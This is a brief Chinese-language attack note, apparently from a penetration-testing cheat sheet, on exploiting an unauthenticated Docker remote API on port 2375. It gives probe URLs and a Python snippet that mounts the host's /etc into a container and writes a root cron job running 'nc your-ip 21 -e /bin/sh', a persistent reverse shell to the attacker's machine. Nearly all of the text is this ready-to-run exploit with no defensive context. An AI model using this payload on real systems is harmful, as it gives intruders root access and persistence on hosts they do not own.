Docker 2375端口¶
关于¶
攻击方法¶
访问目标,验证未授权API调用
http://xxx.xxx.xxx.xxx:2375/version
http://xxx.xxx.xxx.xxx:2375/containers/json
import docker
client = docker.DockerClient(base_url='http://Remote-IP:2375/')
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc your-ip 21 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})